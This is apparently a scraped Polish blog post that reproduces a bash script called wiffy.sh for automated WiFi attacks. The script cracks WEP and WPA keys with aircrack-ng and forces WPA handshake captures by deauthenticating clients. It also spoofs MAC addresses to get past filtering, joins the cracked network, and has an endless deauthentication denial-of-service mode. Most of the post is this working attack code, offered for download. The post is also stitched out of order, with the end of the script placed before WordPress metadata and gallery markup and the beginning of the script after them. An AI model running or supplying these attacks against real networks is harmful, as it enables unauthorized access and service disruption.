debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0004.jpg\"\n){kind=link}
![\n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\t\t\n\t\t\t\t \n \n \n <\/a>\n <\/div>\n\t\t\t\t\t\t\t<\/div> \n\t\t\t\n \n\t\t\n\t\t<\/div>\n\t<\/div>\n Change the MAC address\nmacMode=\"set\"\nfakeMac=\"00:05:7c:9a:58:3f\"\n\n# [\/path\/to\/the\/folder] The file used to brute force WPA keys.\nwordlist=\"\/pentest\/passwords\/wordlists\/wpa.txt\"\n\n# [true\/false] Connect to network afterwords\nextras=\"false\"\n\n# [true\/false] diagnostics = Creates a output file displays exactly whats going on. [0\/1\/2] verbose Shows more info. 0=normal, 1=more , 2=more+commands\ndiagnostics=\"false\"\nverbose=\"0\"\n\n#---Variables----------------------------------------------------------------------------------#\n version=\"0.1 (#5)\" # Version\nmonitorInterface=\"mon0\" # Default\n bssid=\"\" # null the value\n essid=\"\" # null the value\n channel=\"\" # null the value\n client=\"\" # null the value\n debug=\"false\" # Windows don't close, shows extra stuff\n logFile=\"wiffy.log\" # filename of output\ntrap 'cleanup interrupt' 2 # Captures interrupt signal (Ctrl + C)\n\n#----Functions---------------------------------------------------------------------------------#\nfunction findAP () { #findAP\n action \"Scanning network\" \"rm -f \/tmp\/wiffy.tmp && iwlist $interface scan > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\n #arrayESSID=( $(cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}') )\n arrayBSSID=( $(cat \/tmp\/wiffy.tmp | grep \"Address:\" | awk '{print $5}\\') )\n arrayChannel=( $(cat \/tmp\/wiffy.tmp | grep \"Channel:\" | tr ':' ' ' | awk '{print $2}\\') )\n arrayProtected=( $(cat \/tmp\/wiffy.tmp | grep \"key:\" | sed 's\/.*key:\/\/g') )\n arrayQuality=( $(cat \/tmp\/wiffy.tmp | grep \"Quality\" | sed 's\/.*Quality=\/\/g' | awk -F \" \" '{print $1}' ) )\n\n id=\"\"\n index=\"0\"\n for item in \"${arrayBSSID[@]}\"; do\n if [ \"$bssid\" ] && [ \"$bssid\" == \"$item\" ] ; then id=\"$index\" ;fi\n command=$(cat \/tmp\/wiffy.tmp | sed -n \"\/$item\/, +20p\" | grep \"WPA\" )\n if [ \"$command\" ] ; then arrayEncryption[$index]=\"WPA\"\n elif [ ${arrayProtected[$index]} == \"off\" ] ; then arrayEncryption[$index]=\"N\/A\"\n else arrayEncryption[$index]=\"WEP\" ; fi\n index=$(($index+1))\n done\n\n #-Cheap hack to support essids with spaces in-----------------------------------------------------------\n cat \/tmp\/wiffy.tmp | awk -F\":\" '\/ESSID\/{print $2}' | sed 's\/\\\"\/\/' | sed 's\/\\(.*\\)\\\"\/\\1\/' > \/tmp\/wiffy.ssid\n index=\"0\"\n while read line ; do\n if [ \"$essid\" ] && [ \"$essid\" == \"$line\" ] ; then id=\"$index\" ; fi\n arrayESSID[$index]=\"$line\"\n index=$(($index+1))\n done < \"\/tmp\/wiffy.ssid\"\n rm -f \/tmp\/wiffy.ssid\n #--------------------------------------------------------------------------------------------------------------\n}\nfunction findClient () { #findClient $encryption\n if [ -z \"$1\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n client=\"\"\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng (client(s))\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy.dump --output-format netxml $monitorInterface\" $verbose $diagnostics \"true\" &\n sleep 3\n\n if [ \"$1\" == \"WEP\" ] || [ \"$1\" == \"N\/A\" ] ; then # N\/A = For MAC filtering\n sleep 5\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n elif [ \"$1\" == \"WPA\" ] ; then\n while [ -z \"$client\" ] ; do\n sleep 2\n client=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"client-mac\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/' | head -1)\n done\n fi\n\n if [ -z \"$essid\" ] ; then\n essid=$(cat \"\/tmp\/wiffy.dump-01.kismet.netxml\" | grep \"\" | tr -d '\\t' | sed 's\/^<.*>\\([^<].*\\)<.*>$\/\\1\/')\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*hidden* essid=$essid\" $diagnostics ; fi\n fi\n\n command=$(ps aux | grep \"airodump-ng\" | awk '!\/grep\/ && !\/awk\/ && !\/cap\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\n if [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\"\n sleep 1\n fi\n\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy.dump*\" $verbose $diagnostics \"true\"\n if [ \"$client\" == \"\" ] ; then client=\"clientless\" ; fi\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"client=$client\" $diagnostics ; fi\n return 0\n else\n display error \"findClient. Error code: $error\" $diagnostics 1>&2\n return 1\n fi\n}\nfunction update() { # update\n if [ -e \"\/usr\/bin\/svn\" ] ; then\n display action \"Checking for an update...\" $diagnostics\n update=$(svn info http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/ | grep \"Last Changed Rev:\" |cut -c11-)\n if [ \"$version\" != \"0.3 (#$update)\" ] ; then\n display info \"Updating...\" $diagnostics\n svn export -q --force http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh wiffy.sh\n display info \"Updated to $update. (=\" $diagnostics\n else\n display info \"You're using the latest version. (=\" $diagnostics\n fi\n else\n display info \"Updating...\" $diagnostics\n wget -nv -N http:\/\/g0tmi1k.googlecode.com\/svn\/trunk\/wiffy\/wiffy.sh\n display info \"Updated! (=\" $diagnostics\n fi\n echo\n exit 2\n}\nfunction cleanup() { # cleanup mode\n if [ \"$1\" == \"nonuser\" ] ; then exit 3 ; fi\n\n action \"Killing xterm\" \"killall xterm\" $verbose $diagnostics \"true\"\n if [ \"$1\" != \"clean\" ] ; then\n echo # Blank line\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display info \"*** BREAK ***\" $diagnostics ; fi # User quit\n fi\n display action \"Restoring: Environment\" $diagnostics\n\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" == \"$monitorInterface\" ] ; then\n sleep 3 # Sometimes it needs to catch up\/wait\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n fi\n\n if [ \"$debug\" != \"true\" ] ; then\n command=\"\"\n tmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\n tmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\n tmp=$(ls replay_arp*.cap 2> \/dev\/null)\n if [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\n if [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\n if [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\n if [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\n if [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\n if [ ! -z \"$command\" ] ; then action \"Removing temp files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n fi\n\n echo -e \"\\e[01;36m[*]\\e[00m Done! (= Have you... g0tmi1k?\"\n exit 0\n}\nfunction help() {\n echo \"(C)opyright 2010 g0tmi1k ~ http:\/\/g0tmi1k.blogspot.com\n\n Usage: bash wiffy.sh -i [interface] -t [interface] -m [crack\/dos] -e [essid] -b [bssid]\n -c [mac] -w [\/path\/to\/file] (-z \/ -s [mac]) -x -d (-v \/ -V) ([-u] [-?])\n\n Options:\n -i --- Internet Interface e.g. $interface\n -t --- Monitor Interface e.g. $monitorInterface\n\n -m --- Mode. e.g. $mode\n\n -e --- ESSID (WiFi Name)\n -b --- BSSID (AP MAC Address)\n -c --- Client that is connect to the acess point\n\n -w --- Path to Wordlist e.g. $wordlist\n\n -z --- Change interface's MAC Address e.g. $macMode\n -s --- Use this MAC Address e.g. $fakeMac\n\n -x --- Connect to network afterwords\n\n -d --- Diagnostics (Creates output file, $logFile)\n -v --- Verbose (Displays more)\n -V --- (Higher) Verbose (Displays more + shows commands)\n\n -u --- Update\n -? --- This\n\n\n\n Known issues:\n -WEP\n > Didn't detect my client\n + Add it in manually\n + Re-run the script\n > IV's doesn't increae\n + DeAuth didn't work --- Client using Windows 7?\n + Use a different router\/client\n\n -WPA\n > You can ONLY crack WPA when:\n + The ESSID is known\n + The WiFi key is in the word-list\n + There is a connected client\n\n -Doesn't detect any\/my wireless network\n > Don't run from a virtual machine\n > Driver issue - Use a different WiFi device\n > Try the 're[f]resh' option\n > Unplug WiFi device, wait, replug\n > You're too close\/far away\n\n -\\\"Extras\\\" doesn't work\n > Network doesn't have a DHCP server\n\n -Slow\n > Try a different attack... manually!\n\"\n exit 1\n}\nfunction action() { # action title command $verbose $diagnostics screen&file x|y|lines hold\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n xterm=\"xterm\" #Defaults\n command=$2\n x=\"100\"\n y=\"0\"\n lines=\"15\"\n if [ \"$7\" == \"hold\" ] ; then xterm=\"$xterm -hold\" ; fi\n if [ \"$3\" == \"2\" ] ; then echo \"Command: $command\" ; fi\n if [ \"$4\" == \"true\" ] ; then echo \"$1~$command\" >> $logFile ; fi\n if [ \"$4\" == \"true\" ] && [ \"$5\" == \"true\" ] ; then command=\"$command | tee -a $logFile\" ; fi\n if [ ! -z \"$6\" ] ; then\n x=$(echo $6 | cut -d'|' -f1)\n y=$(echo $6 | cut -d'|' -f2)\n lines=$(echo $6 | cut -d'|' -f3)\n fi\n $xterm -geometry 100x$lines+$x+$y -T \"wiffy v$version - $1\" -e \"$command\"\n return 0\n else\n display error \"action. Error code: $error\" $diagnostics 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: action (Error code: $error): $1 , $2 , $3 , $4 , $5 , $6, $7\" 